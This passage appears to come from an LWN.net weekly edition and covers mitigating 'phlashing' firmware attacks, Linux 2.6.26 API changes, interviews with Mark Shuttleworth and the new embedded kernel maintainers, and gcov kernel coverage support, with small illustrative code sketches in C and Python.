seem to be available from either researcher—there doesn't seem to be
much that can be done to deal with phlashing attacks.  A properly
programmed I/O memory
management unit (IOMMU) might alleviate some of the worst cases by
disallowing DMA outside of approved ranges, but card vendors need to make
updates more difficult.  It might be more convenient for an administrator
of a large network to update multiple cards across the wire, but the price
paid for that convenience seems too high.
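
To make the IOMMU idea a bit more concrete, here is a minimal sketch in C
of the kind of check involved: a DMA request is allowed only if it falls
entirely inside an approved window.  Everything in it (the dma_window
structure, the dma_allowed() function, the addresses one might pass in) is
hypothetical and exists only for illustration; a real IOMMU performs this
sort of check in hardware using page tables, not a table scan in software.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical description of one approved DMA window. */
struct dma_window {
    uint64_t base;   /* first permitted bus address */
    uint64_t len;    /* size of the window in bytes */
};

/*
 * Return true only if the range [addr, addr + len) lies entirely inside
 * one of the approved windows.  The comparison works on offsets so that
 * addr + len is never computed and cannot wrap around.
 */
static bool dma_allowed(const struct dma_window *w, size_t nwin,
                        uint64_t addr, uint64_t len)
{
    assert(w != NULL || nwin == 0);

    for (size_t i = 0; i < nwin; i++) {
        if (addr < w[i].base)
            continue;                       /* starts below this window */

        uint64_t off = addr - w[i].base;    /* offset into the window */

        if (off <= w[i].len && len <= w[i].len - off)
            return true;                    /* fits completely */
    }
    return false;                           /* outside every window */
}
```

With a single window covering the card's own buffers, a transfer into
those buffers would pass this check, while an attempt by rewritten
firmware to read arbitrary host memory would be refused.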


		A summary of 2.6.26 API changes


The 2.6.26 development cycle has stabilized to the point that it's possible
to look at the internal API changes which have resulted.  They include:


 At long last, support for the KGDB interactive debugger has been 
     added to the x86 architecture.  There is a DocBook document in the
     Documentation directory which provides an overview on how to use this
     new facility.  Some useful features (e.g. KGDB over Ethernet) are not
     yet supported, but this is a good start.

 Page attribute table (PAT) support is also (again, at long last)
     available for the x86 architecture.  PATs allow for fine-grained
     control of memory caching behavior with more flexibility than the
     older MTRR feature.  See Documentation/x86/pat.txt for more
     information. 

 ioremap() on the x86 architecture will now always return an 
     uncached mapping.  Previously, it had taken a more relaxed approach,
     leaving the caching as the BIOS had set it up.  The practical result
     was to almost always create uncached mappings, but with
     occasional exceptions.  Drivers which depend on a cached mapping will
     now break; they will need to use ioremap_cache() instead.
     See this article for
     more information on this change and caching in general.

 The generic semaphores
     patch has been merged.  The semaphore code also has new
     down_killable() and down_timeout() functions.

 The final users of struct class_device have been converted to
     use struct device instead.  The class_device
     structure, along with its associated infrastructure, has been
     removed. 

 The nopage() virtual memory area operation has been removed;
     all in-tree code is now using fault() instead.

 The object debugging
     infrastructure has been merged.


 Two new functions (inode_getsecid() and
     ipc_getsecid()), added to support security modules and the
     audit code, provide general access to security IDs associated with
     inodes and IPC objects.  A number of superblock-related LSM callbacks
     now take a struct path pointer instead of struct
     nameidata.  There is also a new set of hooks providing
     generic audit support in the security module framework.

 The now-unused ieee80211 software MAC layer has been removed; all of
     the drivers which needed it have been converted to mac80211.  Also
     removed are the sk98lin network driver (in favor of skge) and bcm43xx
     (replaced by b43 and b43legacy).

 The ata_port_operations structure used by libata drivers now
     supports a simple sort of operation inheritance, making it easier to
     write drivers which are "almost like" existing code, but with small
     differences. 

 A new function (ns_to_ktime()) converts a time value in
     nanoseconds to ktime_t.

 Greg Kroah-Hartman is no longer the PCI subsystem maintainer, having
     passed that responsibility on to Jesse Barnes.

 The seq_file code now accepts a return value of SEQ_SKIP from
     the show() callback; that value causes any accumulated output
     from that call to be discarded.

 The Video4Linux2 API now defines a set of controls for camera devices; 
     they allow user space to work with parameters like exposure type, tilt
     and pan, focus, and more.

 On the x86 architecture, there is a new configuration parameter which
     allows gcc to make its own decisions about the inlining of functions,
     even when functions are declared inline.  In some cases, this
     option can reduce the size of the kernel's text segment by over 2%.

 The legacy IDE layer has gone through a lot of internal changes which
     will break any remaining out-of-tree IDE drivers.

 A condition which triggers a warning from WARN_ON will now
     also taint the kernel.

 The get_info() interface for /proc files has been
     removed.  There is also a new function for creating /proc
     files, proc_create_data().  Unlike the older proc_create(), this
     version takes a data pointer, ensuring that it will be
     set in the resulting proc_dir_entry structure before user
     space can try to access it.

 The klist type now has the usual-form macros for declaration and 
     initialization: DEFINE_KLIST() and KLIST_INIT().
     Two new functions (klist_add_after() and
     klist_add_before()) can be used to add entries to a klist in
     a specific position.

 kmap_atomic_to_page() is no longer exported to modules.

 There are some new generic functions for performing 64-bit integer
     division in the kernel: div_u64(), div_u64_rem(), div_s64(), and
     div_s64_rem().  Unlike do_div(), these functions are explicit about
     whether signed or unsigned math is being done.  The x86-specific
     div_long_long_rem() has been removed in favor of these new
     functions.

 There is a new string function, sysfs_streq().  It compares two
     strings while ignoring an optional trailing newline.

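 The prototype for i2c probe() methods has changed; in addition to the
     struct i2c_client pointer, probe() now takes a const struct
     i2c_device_id pointer named id.  The new id argument supports i2c
     device name aliasing.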
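
Two of the helpers in the list above are easy to illustrate outside the
kernel.  What follows is a user-space sketch, not kernel code: it assumes
that the division helpers in question behave like the kernel's
div_u64_rem() and div_s64_rem(), and that the string function behaves like
sysfs_streq().  The sketch_ names are hypothetical stand-ins chosen to make
clear that these are not the real implementations.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/*
 * Unsigned 64-by-32 division.  The quotient is returned and the
 * remainder is stored through the pointer; the unsigned types in the
 * prototype make the kind of arithmetic explicit.
 */
static uint64_t sketch_div_u64_rem(uint64_t dividend, uint32_t divisor,
                                   uint32_t *remainder)
{
    assert(divisor != 0);
    *remainder = (uint32_t)(dividend % divisor);
    return dividend / divisor;
}

/*
 * Signed variant.  C99 division truncates toward zero, so the remainder
 * takes the sign of the dividend.  Callers must avoid INT64_MIN / -1,
 * which overflows.
 */
static int64_t sketch_div_s64_rem(int64_t dividend, int32_t divisor,
                                  int32_t *remainder)
{
    assert(divisor != 0);
    *remainder = (int32_t)(dividend % divisor);
    return dividend / divisor;
}

/*
 * Compare two strings, treating a single trailing newline on either one
 * as insignificant (useful for values written with "echo").
 */
static bool sketch_streq_nl(const char *s1, const char *s2)
{
    /* Skip over the common prefix. */
    while (*s1 && *s1 == *s2) {
        s1++;
        s2++;
    }

    if (*s1 == *s2)
        return true;                    /* both strings ended together */
    if (!*s1 && *s2 == '\n' && !s2[1])
        return true;                    /* s2 has one extra newline */
    if (*s1 == '\n' && !s1[1] && !*s2)
        return true;                    /* s1 has one extra newline */
    return false;
}
```

The separate signed and unsigned entry points are the point of the
exercise: the caller picks the arithmetic by name instead of relying on
the implicit behavior of a macro like do_div().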


One change which did not happen in the end was the change to 4K
kernel stacks by default on the x86 architecture.  This is still a desired
long-term goal, but it is hard to say when the developers might have enough
confidence to make this change.

		Mark Shuttleworth on the future of Ubuntu


The life of South African Mark Shuttleworth has been a kind of geek dream: found and sell Internet company for $500+ million in mid-20s; spend $20 million to become the second space tourist; and create a GNU/Linux distribution with a cool name that has become the most popular on the desktop. 


Here, he talks to Glyn Moody about Ubuntu's new focus on the server side, why Ubuntu could switch from GNOME to KDE, and what happens to Ubuntu and its commercial arm, Canonical, if Shuttleworth were to fall out of a spaceship.

I believe you made about $500 million when you sold the certificate authority Thawte Consulting to Verisign in 1999. Creating a GNU/Linux distribution is not the most obvious follow-up to that: what were the steps that led from the early part of your life to the current phase?


I have a belief that we should all paint our lives as boldly as we can, and we should explore the things that are the most interesting to us personally. I'm always disappointed when I see people asking the question: "What's going to be the next big thing? What career should I choose? Where will the most money be paid?"

It's impossible to know what the future holds, but it's very possible to know what you might be personally interested in. So after Thawte, I spent some time setting up the [Shuttleworth] Foundation and some time setting up the [HBD] Venture Capital group, which I wasn't going to run personally, but which I thought was a good thing to have, and put a team in place to do that.

And then I thought: what are the most interesting challenges out there, what are the opportunities that I'm sort of uniquely positioned to do? And the opportunity to go to Russia and train there and then fly was the opportunity that I chose.

After that, it was more difficult. There were three things that I was looking at. Each of them was exploring the impact of the Internet in society and in commerce, but in different ways. And of all of them, [Ubuntu] is the project I thought was the most interesting, the most difficult, the biggest scale project. And ultimately, if we succeed, the one that will have the biggest impact. So I took this one on.

Given that Ubuntu's roots are on the desktop, what's behind the recent shift in strategy to address the server side too?


That's not a change in strategy, it's more a pull through. We started with a very narrow focus on the desktop, and that allowed us to punch in. As we've penetrated the industry, there's a natural pull through where someone who's started using us on their desktop has now started setting up Ubuntu on a server.

You could always run Ubuntu on a server; there was never a significant reason not to. That body of users has now reached a critical mass on the server, and so our server work is now more responding to that than a shift in strategy. We continue to make the desktop our labor of love; the server requires a very enterprise-oriented approach.  We've built out a dedicated team that just handles that. We haven't re-assigned people who are desktop specialists and asked them to test a server.

You're not worried you're spreading yourselves too thinly?


That is a risk, and that's something we discuss here a lot. There are benefits to offering a platform that can be used in both configurations. We see companies often saying: "We love your desktop. We would definitely choose your desktop if we could also use you on the server."

Companies don't like to introduce arbitrary diversity in technology. Everybody has heterogeneous systems, but they don't like to make that situation worse without a very good reason for it. Ubuntu is a very good server for certain use-cases now, just like Ubuntu is a very good desktop for certain use-cases. Our challenge over the next couple of years is just to broaden the base to which it appeals on both fronts.

On the server, it's very much a question of taking time to build the portfolio of relationships with other vendors. There are a lot of applications - what we call solutions - which are now free software-based: standard web-serving, mail-serving and so on. Ubuntu does very well for those. Increasingly, the challenge for us now is to build out the portfolio of non-free software certifications, everything from Oracle through SAP and thousands and thousands of pieces in between. That will take time; it's not something we can achieve overnight.

One of the interesting things you've floated recently is the idea of coordinated releases amongst GNU/Linux distributions. Where did the idea come from, and what would the benefits be?


What I'm really, profoundly interested in, is how a different approach to technology makes new things possible.

The business model of the proprietary software industry is licensing software to new customers or updates of software to existing customers. You make money when you have a new version. So there's an imperative both to release new versions and to have a whole bunch of new features in those versions, specific features that you articulate in advance.

In the free software world, we don't have that to cloud our thinking. We accept that development goes at the pace that it goes. If we operate on a basis that we only integrate new features into the platform when we consider them ready, then we can effectively release the platform at any time. When you look at the world through those glasses, it makes sense then to articulate not that you'll ship the product when you have certain features, but you'll ship it at a certain time.  That's actually really useful to all of your users, because they can plan for a particular time. This wasn't our stroke of genius: GNOME was the one that really championed this idea. 

We took the fairly radical step of saying we could do that across the whole ecosystem.  The reason that is radical is because when you're one project, you can make decisions for yourself. But obviously as Ubuntu, we aggregate everyone from the Linux kernel to the GNOME project through the Firefox web browser and the Apache web server, and a ton of stuff in between. So people said: "How on earth will you tell them when to ship their stuff so that you can ship what you want?"

We've simply taken the view that we have a very carefully-managed release process, and a new version from one of those projects just doesn't get in unless it's ready at the time it needs to be ready for us to have confidence that it can be integrated and tested.

What this has really done is it's separated, very elegantly, the processes associated with R&D, which is focused on what new features we're going to develop, and how to manage that, which is very difficult to put on a particular schedule, from the process of integration, testing and distribution.

Now, if I look at a company like Oracle or Microsoft, they have both of those responsibilities. So you end up in this horrible situation where they start saying now: "you'll have the next generation file system in this version and it'll ship on that date." And then reality intervenes, and that puts them in a very awkward situation. We just don't have that.

To come back to the original idea, we try to understand what's the essential difference between the way we produce software and the way other people produce software, and what becomes possible because of that, that wasn't possible before, both economically and technologically. That's really what Ubuntu's all about. We want to express fully the real nature of free software, as a true commercial, economic entity in its own right.

Have you had any feedback yet from the other distributions?


Not yet, no. This is something that we've only just started articulating. My hope is that other distributions will see the benefits of synchronizing all of our releases. It doesn't matter whose cycle we converge on, but the idea of synchronizing releases then cues all of those thousands of other projects, that if they want their latest technology shipped by a particular date, if they're able to get it done by a particular time, then that will happen not just with Ubuntu, but with a whole bunch of different platforms. I think it's a powerful idea.

There are commercial interests that might block it. It will be interesting to see if the other commercial distributions are nervous to put themselves in a situation where they really are being compared, apples to apples. We'll see.

Given that more and more computing will be done in the cloud, is that going to be a threat or an opportunity for Ubuntu?


It's a real opportunity, both on the server side and on the client side. To build a server-side cloud infrastructure, you want an operating system which is not licensed per seat or per processor or per machine or per instance. It is simply freely available with all of its updates, and Ubuntu meets that.

You can go from a hundred instances in the cloud to a hundred thousand instances in the cloud and legally pay Canonical no more money. You will probably want to have some sort of support relationship with us, but that's entirely separate from the actual licensing of the platform, and it's not required in any way. We cut a deal to support you in the way that you need support.

So, economically on the server side that's a very big winner, and Ubuntu is seeing a lot of adoption and traction there. You also want something that can be shrunk down so that in your cloud server you only have the pieces which you really need. Every extra piece is an extra piece of disk space that's not being used; it's an extra piece of memory that's not being used. It's an extra thing that can have a security issue that's not being used. And so you may as well get rid of it. Ubuntu's very modular - probably the most modular of the commercial platforms; this comes from our Debian heritage.

On the client side, for cloud computing you really want something that "speaks the Internet", and does so very well and very securely, and speaks the web very well and very securely. Ubuntu running Firefox is a really compelling option there. 

So I think there's a good chance that the next YouTube is running in the cloud and running on Ubuntu.

One of the versions of Ubuntu is Gobuntu, which has no non-free elements whereas Ubuntu does have some. Where do you stand on the question of including proprietary elements in a free software distribution?


Very clearly, I'm a pragmatist. The non-free pieces of Ubuntu are nothing to do with Canonical's commercial interests. It's not like we've put pieces in there that suit us and don't suit anybody else. They're drivers for hardware where the manufacturers of that hardware haven't yet wrapped their heads around the idea of releasing the source code that makes their hardware work. They're not applications.

We work with those vendors to help them understand that in fact it's to their advantage to make their source code open source. They will get much better quality. We have real examples of this. We have much better quality drivers with much better reliability that make their hardware more attractive to a bigger portion of the market.

But we are willing to put in drivers that are not yet open source, because we figure it's more important to give everybody's grandma the opportunity to actually run free software applications on a free software environment, even if they need some proprietary drivers to get their hardware going. That puts us squarely in the pragmatist camp rather than the purist camp. 

Gobuntu is an attempt to create a version of Ubuntu that does away with that, but also that is specifically designed to be a platform where other ideas about Copyleft can be explored - this meme about collaborative creation of something is extremely powerful and software is just the tip of the iceberg - we've already seen Wikipedia. I think every industry is going to need to adjust its thinking to say: "How can this participative computing phenomenon energize us?"

Gobuntu aimed to do that. People didn't really flock to it, so I think we will stop doing Gobuntu. People liked the idea, but not the people who would actually invest their time in it. I think it's too closely associated with Ubuntu. There's another one called gNewSense, which is exactly the same - Ubuntu with all the non-free stuff taken out. But because it's a separate organization, people feel more comfortable participating there. I don't mind, really.

On a related issue, do you worry that GNOME is becoming too involved and enmeshed with Microsoft technologies? If the patent problem with GNOME becomes too great, might you switch to KDE one day?


I think it's very healthy that we have multiple desktop platforms, and that they're both committed to free software and sources of innovation and inspiration and competition. We picked GNOME mostly because of its approach to the release cycle and because it had a real strong commitment back in 2004 to usability.

Since then, KDE has also embraced the idea of usability as a primary driver, and they've done some really interesting things on the technology front. I keep a level of awareness of KDE, and I run KDE at home just to make sure I have a sense of where it's going and how it is doing. I like the rivalry. We might [switch]; it's good to have that option. 

As for patents in software, I think society does a very bad deal when it gives someone a monopoly in exchange for nothing. The traditional patent deal was you gave someone a monopoly in exchange for disclosure of a trade secret. You can't really have trade secrets in software.

Of course, the entrenched interests like to frame this as "patents are all about innovation", when they really aren't. There's very strong, academic, peer-reviewed research that suggests that patents stifle the pace of change and innovation. 

The real insight with patents is that what society is buying with that monopoly is disclosure. And so the real benefit to society is accelerated disclosure of new ideas - not convincing people to invest. People have ideas all the time. You can't stop the human mind from innovating. People do research and development to win customers, that's what it's really about. It's not to file patents. So the entrenched patent holders really aren't doing much of a service to society when they articulate their position in very flawed terms.

With regard to GNOME and Microsoft, I'm not concerned. My view is that to win, you have to have your own vision. You have to have a very clear idea of what you can deliver that's unique. You can't go around sort of chasing someone else's coat tails.  So while I respect the people in the free software community who invest a lot of time in making compatible implementations of other people's technology, I don't think that's the real recipe for success for free software. We have to give people a reason to use our platform for itself, not because it's a cheap version of someone else's.

And in fact, the real successes of free software have been the places where it has just blown away the alternatives. The Internet runs on free software, and not because it has copied anything from Microsoft. The proprietary software guys like to accuse free software of not innovating and not doing anything other than sort of walking down the same path that they've already walked, which is always easier. That's just not true, but guys like the Mono Project are reinforcing that stereotype.

Finally, one of the issues that has traditionally preoccupied the Linux community is: what happens if Linus falls under a bus? So I was wondering what happens to Canonical and Ubuntu if you fall under a spaceship or something?


Fall *out* of a spaceship! Well, I've made suitable preparations so that if I'm looking the wrong way when the bus comes, economically both Canonical and Ubuntu are fine: there are provisions in my will to make any additional investments needed. 

As to the other things that I do for the project, they will have to find someone else to step into my shoes. You know, there's a lot of good talent, both technically and commercially and socially. I think the project would continue.

Glyn Moody writes about open source at opendotdotdot.

		An interview with the new embedded maintainers


Embedded Linux is getting a lot of attention these days.  A new kernel.org
mailing list, linux-embedded—archived
here—has been set up, with discussions and patches already being
posted.  In addition, Paul Gortmaker and David Woodhouse have volunteered
to be the "embedded maintainers" for the kernel to help coordinate the embedded
Linux community.  They graciously agreed to a joint email interview to shed
some light on their new roles.

LWN:  What is your background with Linux, especially with embedded
Linux? 


David: I got involved in Linux while I was at University, and ended up
working at Nortel during one of the summer vacations, on a project for
networking over mains power lines. It involved Linux boxes as routers,
and I was working on solid state storage for that. From that, and from
the basic support we had for similar devices in the PCMCIA code base,
the MTD [Memory Technology Device] subsystem grew.

After a while, I ended up working for Red Hat's engineering services
division, doing board ports, drivers and other work. That's when JFFS2
was written, as part of a customer contract.

I've been at Red Hat since 2000, in various rôles including spending
most of the last couple of years on OLPC. Due to HR misconduct, I
handed in my notice on Monday and will be going elsewhere. I spoke to my
new boss before volunteering for the 'embedded maintainer' rôle, and he
was happy with that—it's another Linux-friendly company where I'll be
doing kernel development, and community interaction will continue to be
part of my day job.


Paul: I started using Linux back in the pre-1.0 days, and having always
been one to take things apart and see how they work, being able to do that
with the OS appealed to me.  I put together various documents to help
people back when the entry level into Linux was quite high, started fixing
and writing drivers, and on it went from there.  In 2005, I joined Wind
River, where I've been primarily focused on kernel and board-specific
kernel patches, and this has given me the opportunity to be exposed to all
the different architectures and lots of board variants within each
architecture family.


LWN: What is the role you see for the embedded Linux maintainers for
the kernel?


David: A bunch of things really. It's not like a normal maintainer rôle
where we take ownership of a certain section of code; it's a bit more fluid.

To start with, one of the things we really need to do is work with the
various people who are using Linux in "embedded" situations, and help
them to work better with the community. That isn't just the vendors of
consumer equipment—it's communities like OpenWRT, handhelds.org, OLPC
too. In no other field is the development of the Linux kernel so
balkanised, with people all over the place carrying their own patches or
even full trees of code.

Another part of the job, which is actually something I've been doing for
years anyway, is reviewing general changes in the kernel with a
particular mind to how they affect embedded systems. That's not just
bloatwatch, although obviously that's a part of it. It also covers
things like watching the IBM zSeries folks provide execute-in-place
support for block devices under z/VM, and saying "hey, how can we use the
same memory management for XIP from flash?".

The other main part of it is implementing features in the core kernel
which are motivated by "embedded" requirements. Like the tricks for
compiling parts of the kernel with "-fwhole-program --combine" to let
GCC optimise better and reduce code size, for example.

A certain amount of it, especially the new
linux-embedded@vger.kernel.org list, I expect to be a kind of targeted
kernelnewbies—but obviously with a more specific focus on embedded
issues, and to a certain extent on professional developers rather than
having such a high proportion of hobbyists. Although I certainly
wouldn't want to discourage the hobbyists and students from getting
involved with embedded. It's a good way to get people to send you cute
toys, after all!

I was trying to avoid having a 'linux-embedded' git tree, but for small
things like the patch Tim Bird just sent to the linux-embedded list to
introduce CONFIG_CONSOLE_TRANSLATIONS, I suppose it makes sense—so
I've created that at git://git.infradead.org/embedded-2.6.git.


Paul: There are several things that can be done here that will all
benefit Linux and its users in the end.  To start with, I'm hoping that we
can close some of the entry-level gap between people who don't necessarily
track kernel development but have decided to develop on Linux with a
specific embedded use case in mind, and those people who are long-time
Linux developers.  We can also improve the linkage between people writing
feature changes and some of the users of those features who are likely to
be impacted, but otherwise would probably go unheard.  We can also look at
externally maintained features of interest to embedded users, try to
determine what blocking factor is stopping them (or parts of them) from
being merged upstream, and then assist in removing those barriers where
possible.


LWN: What are the specific problems that are faced by embedded developers
trying to use Linux?  What can you do to make that situation better?


David: I think the biggest single problem has always been the same—it's that
people are too focused on getting their stuff out the door as quickly as
possible without much thought to working with upstream. Managers aren't
budgeting the time to get things merged, and engineers aren't talking
about their design early enough that it can be improved before it's a
fait accompli.

That extra time isn't just about being a good citizen—failing to do
it almost always comes back to bite you personally, when you come to
do a new product, a product update, or even need to merge in changes
from upstream to fix bugs. But everybody seems to need to learn that
the hard way.


Paul: A lot of times, you get the situation where a group who is
developing for an embedded platform is focused 100% on getting their
product up, running and deployed.  The developers involved aren't
necessarily hard core Linux folks, and it usually plays out by them picking
a kernel version, getting their stuff in their local tree, and that is it.
They may not know git, they probably don't have insight into who the
respective subsystem maintainers are, they may perceive LKML as too
hostile, or they may not have management buy-in on trying to push stuff
upstream.  But inevitably, some time passes, and then they have a carry
forward task where they try and do a big jump uprev of all their changes,
and this repeats forever.

Most people who have had to endure the jump uprev vs. a continual tracking
and carrying of changes will tell you the jump is not the way to go for a
multitude of reasons, but it seems a lesson that everybody ends up having
to learn on their own.  So, I'm hoping we can get some of these people more
aligned with the typical Linux developer workflow, i.e. work from the
latest codebase, create logical changesets that can be submission
candidates etc.  I've been in a couple of meetings recently where we've had
the opportunity to educate embedded developers on the advantages of doing
this, and the feedback has been positive so far.


LWN: The size of the kernel is getting larger in general; is it getting
too big for some embedded applications?  What, if anything, should be done
to remedy that situation?


David: I know there are people who'll want to take me out back and shoot
me for this, but I think a large part of the solution to that is knowing
when Linux is the answer, and accepting that sometimes it isn't. I've
always been a bit dubious about implementing XIP support in Linux, for
example, on the basis that if you care that much, you should probably have
been using something like eCos anyway.

Getting back to the real question, though, there are things we can do.
The smaller, more efficient "slub" memory allocator is an example, as is the
--combine thing I mentioned above. The trick is to find ways to improve
matters without just littering the whole thing with ifdefs.


Paul: There will always be some hardware or some use case where Linux
isn't the right choice.  It only makes sense to use the right tool for the
job.  However we do want to make sure that Linux is that right tool in
as many cases as possible.   On the plus side, the resources that are
found on a typical embedded target today are a lot more rich than they
were years ago.  We just need to make sure that in optimizing for the
general x86 use case, we don't inadvertently hinder these more fringe
use cases coming from the embedded world.


LWN: What do you see as the priorities for kernel work to better
support
embedded Linux?


David: One important priority right now is replacing JFFS2. I wrote
it, so I'm
allowed to say that—it was good for its time, with NOR flash devices
on the order of 32MiB. But having made it work on 1GiB of NAND flash in
OLPC, I certainly agree with the observation that it's being pushed past
its design limits. I'm very keen to get LogFS and/or UBIFS merged into
the kernel and stabilised to the point where we can really start moving
to them.

We need to revamp the MTD API fairly urgently too. It was derived from
the PCMCIA code we had at the time without much planning, and we really
need to improve on it now.

There may be a certain amount of bias in the items I've picked out, I
suppose.


Paul: The embedded community as a whole is probably the biggest user
of all the
architectures outside of the x86 based platforms.  Sometimes the
functionality
of certain things doesn't get much testing outside of the basic x86 family.
For
example, one of the features that there is considerable interest in is the
full
preempt_rt patch set.  Yet once you stray outside of the x86 family, you
are
pretty much guaranteed to run into drivers specific to embedded targets
that
don't play nice once this patch set is in place.  This isn't such a
surprise,
simply because the intersection of the two hasn't been explored yet.  I
think
there is value here in getting these types of intersections explored sooner
rather than later, by reducing some of the gap between the people working
on
these sorts of features, and those intending to use them on embedded platforms.


LWN: Do you have any specific goals for timelines of getting various
features merged?


David: Other than "ASAP" for LogFS and UBIFS, not particularly.
Stuff is merged when it's ready. 


Paul: At this point in time, no.  I'm not really interested in
hijacking anyone's
project or feature and trying to drive it towards some self-imposed merge
deadline.  I'd rather work with them to try and find out what the problem
areas
are, help with those where possible, be they logistical or technical and
get
them to a point where they feel that they can offer up merge candidates.


LWN: What problems do you foresee in working with other kernel
developers 
who may have less (or no) interest in the concerns of the embedded 
community?  Are there specific features that may be difficult or 
impossible to get merged?


David: I know it's fashionable to claim there's a big disconnect
between
embedded and big-iron users, but actually there's a lot more overlap
than many people seem to realise. I mentioned XIP earlier; can you also
guess who was first to implement tickless support?

A lot of the problem has been people who show up and throw their code
over the wall, then run away. Or worse, those who don't even throw it
over the wall at all. People seem to have forgotten how long it took us
to educate the enterprise vendors and get them to work nicely with us;
we're a bit behind the curve on the embedded side but we're getting
there. And organisations like CELF are doing good work on that front,
too.


Paul: We have to be realistic.  There will always be some features
that either
are too invasive to be sensible merge candidates, or the particular
feature has such a small user base, that it may not make sense from
a carrying cost point of view to target it for inclusion in the standard
kernel.  Fortunately, I think the Linux developer community at large has
generally been flexible in accommodating most things, while at the same
time
excluding things where the best interest of the kernel as a whole needed
to come first.

In such cases where a feature doesn't look to be a probable merge
candidate,
not all is lost.  We have to capitalize on the remaining value adds that
come
with still working with it as if it was a merge candidate.  Things like
cherry-picking parts of it that are of global value and thus reducing the
carrying cost.  Or being able to voice an opinion at the appropriate time
if
the maintainer of the feature notices that a proposed change somewhere else
in
the kernel will impact the feature that they have been maintaining
independently.  So I think we still want to work towards getting the people
handling these "harder" features of interest to the embedded community
working
more in parallel with the main kernel community.


LWN: The term "embedded Linux" covers a huge spectrum of devices and
uses 
of Linux, everything from devices where the OS is completely invisible 
up through internet tablets and UMPC devices that are essentially 
desktops squeezed into a smaller package.  Where on that spectrum do 
your interests lie?  What do you think the challenges of trying to 
support all of those different uses will be?


David: My interest is everywhere in that spectrum—and beyond. Too
much focus
on one small area is the way to ensure that you solve your own problems
while pessimising things for other people. I think it's important to
keep a certain amount of holistic focus, because that's how we can make
sure that Linux scales well both up and down.


Paul: Absolutely.  It seems that people naturally associate embedded
with the
small and resource constrained end of the scale.  But the reality is that
there are people who are wanting to use Linux in embedded applications
where
the baseline hardware has 16 cores and gigabytes of memory.  On the one
end of the scale you are interested in things like efficiency of resource
usage, quick boot times, and on the other end of the scale, your interests
are more likely around features relating to specific high availability 
features that may not be present in the standard kernel tree.

These are clearly separate problem spaces, but the common thing they both
share is that you've got a group using a specific piece of hardware with a
specific use case in mind.  This tends to bring out the "works for us, let's
get
it done and shipping" mentality, and the work tends to never make it out to
where others can review it and look at merging bits that make sense.  I'm
hoping this is where we can make a difference.


We would like to thank David and Paul for taking time to answer these
questions.

		Profiling kernel code coverage


Measuring which lines of code get executed and how often can be a useful
tool for debugging or testing.  That capability has long been
available for user space programs in the form of gcov.  A recent
patch seeks to allow kernel
hackers access to the same tool.


There are three main components to making gcov work with the kernel: changing
the build to add the -fprofile-arcs -ftest-coverage gcc flags,
hooking up the gcc-generated code to record the coverage information, and
providing a way for the kernel to output the data to user space.
The GCOV_PROFILE kconfig option governs whether gcov support is included in
the build, while GCOV_PROFILE_ALL activates profiling for the
entire kernel.  If desired, individual directories and files can be
selectively included or excluded from being instrumented.


The new kernel/gcov directory contains the necessary functions to
support the gcc-generated profiling code.  This includes handling
statically linked kernel code as well as kernel modules that are loaded.
Information gathered from code in modules can be either preserved or
discarded when they are unloaded.  This will allow analysis of the module
unloading path that could be useful for detecting resource leaks or other
problems in that process.


A user space program compiled for gcov
will write a binary file to the filesystem for each source file that contains the 
data corresponding to the execution path through that file.  The kernel
needs to do that differently, so instead it writes to a file in debugfs.
Each source file that is compiled for gcov will store its information in
/sys/kernel/debug/gcov/path/file.gcda, where
/sys/kernel/debug is the debugfs mount point and path is
the path to the file in the kernel tree.  The individual .gcda
files can also be written to, which will result in setting the
accumulated data for that source file back to zero.
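
The path mapping described above can be sketched in a few lines of Python.
This is only an illustration: the helper names gcda_path and reset_coverage
are hypothetical, and the layout simply follows the description here
(debugfs mount point, then gcov, then the source path with a .gcda suffix).
A given kernel may arrange the tree differently.

```python
import posixpath

# Assumes debugfs is mounted at /sys/kernel/debug, as in the text.
DEBUGFS_GCOV = "/sys/kernel/debug/gcov"


def gcda_path(source_file, gcov_root=DEBUGFS_GCOV):
    """Map a source path inside the kernel tree to its .gcda data file."""
    # Drop any leading slash so the join stays underneath gcov_root.
    stem, _ext = posixpath.splitext(source_file.lstrip("/"))
    return posixpath.join(gcov_root, stem + ".gcda")


def reset_coverage(source_file, gcov_root=DEBUGFS_GCOV):
    """Write to the .gcda file; per the text, a write zeroes the counters."""
    with open(gcda_path(source_file, gcov_root), "wb") as f:
        f.write(b"0")


print(gcda_path("kernel/sched.c"))
```

Calling reset_coverage() before running a test and reading the .gcda file
afterward would isolate the coverage attributable to that test alone.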


Once the data has been gathered, gcov can be invoked to produce a file that
annotates the source, showing each line with the number of times it has been
executed.  LCOV is a graphical tool that can also be used to examine the
coverage information.  LCOV and the gcov kernel patches both come from the
Linux Test Project, which has an extensive kernel test suite and is using
gcov to expand the coverage of its tests.


As part of the patch set, the seq_file interface has been
extended to allow writing of arbitrary binary data to a virtual file.
Currently, the seq_file interface is somewhat character oriented, so a
function has been added to fs/seq_file.c to provide that ability:

    int seq_write(struct seq_file *seq, const void *data, size_t len);

As the prototype implies, it writes len bytes from
data to the seq_file seq.
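
To make those semantics concrete, here is a user-space Python model of such
a binary write helper.  It is only a sketch: the SeqBuffer class and its
fields are hypothetical stand-ins for struct seq_file, the method is named
seq_write after the mainline kernel function, and the overflow handling
(refuse the write and mark the buffer full) is an assumption about how the
helper behaves rather than something stated in the patch description.

```python
class SeqBuffer:
    """Hypothetical user-space stand-in for the kernel's struct seq_file."""

    def __init__(self, size):
        self.buf = bytearray(size)  # fixed-size output buffer
        self.size = size
        self.count = 0              # number of bytes used so far

    def seq_write(self, data, length):
        """Copy `length` raw bytes of `data` into the buffer.

        Returns 0 on success, or -1 if the bytes do not fit (assumed
        behavior; nothing is copied in that case).
        """
        chunk = bytes(data[:length])
        if len(chunk) != length:
            raise ValueError("data is shorter than length")
        # Strictly-less comparison is an assumption: an exact fit is
        # treated as an overflow too.
        if self.count + length < self.size:
            self.buf[self.count:self.count + length] = chunk
            self.count += length
            return 0
        self.count = self.size      # mark the buffer as overflowed
        return -1


s = SeqBuffer(8)
print(s.seq_write(b"\x00\x01\x02", 3), s.count)
```

Unlike a string-oriented helper, nothing here interprets the payload, so
embedded zero bytes pass through untouched.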


Efforts to get gcov support into the kernel have been around since
2002, 
but the code was recently rewritten to be a better fit for recent
kernels. In the patch, Peter Oberparleiter says "due to regular
requests, I rewrote the gcov-kernel patch from scratch so that it
would (hopefully) be fit for inclusion into the upstream kernel."
One of the bigger changes is to move the user space interface for gcov from
/proc into debugfs. 


